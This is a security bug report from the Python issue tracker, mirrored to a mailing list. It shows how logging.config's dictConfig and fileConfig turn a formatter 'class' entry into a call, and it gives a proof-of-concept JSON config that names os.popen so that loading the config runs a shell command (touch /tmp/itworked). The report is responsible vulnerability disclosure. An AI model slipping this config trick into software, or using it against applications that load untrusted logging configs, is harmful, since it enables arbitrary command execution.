New submission from MarkBaggett <[email protected]>:
I know there are multiple warnings about the use of eval() in the listener. But
_resolve() and resolve() used by both fileConfig and dictConfig also seem like
they can also be abused. Here is a working example.
$ ls /tmp/itworked
ls: cannot access '/tmp/itworked': No such file or directory
$ cat log.config
{
"version":1,
"formatters":{
"EXPLOIT":{
"class": "os.popen",
"format": "touch /tmp/itworked",
"datefmt": "r",
"style": 1
}
}
}
$ python calculator.py
/usr/lib/python3.8/subprocess.py:848: RuntimeWarning: line buffering
(buffering=1) isn't supported in binary mode, the default buffer size will be
used
self.stdout = io.open(c2pread, 'rb', bufsize)
WARNING:calculator.support_functions:Internet Confirmed.
WARNING:calculator.support_functions:Adder object exported!
WARNING:calculator.support_functions.adder:Set initial value to 0
WARNING:calculator:The result is 15
$ ls /tmp/itworked
/tmp/itworked
I could probably clean up that error message if I took 2 minute to refresh my
os.popen knowledge, but I think you get the point. Are you aware of this issue?
Thanks for all you to on this import module!
----------
messages: 409623
nosy: MarkBaggett
priority: normal
severity: normal
status: open
title: logger.config.configure_formatter executes arbitrary code
type: security
versions: Python 3.10
_______________________________________
Python tracker <[email protected]>
<https://bugs.python.org/issue46251>
_______________________________________
_______________________________________________
Python-bugs-list mailing list
Unsubscribe:
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
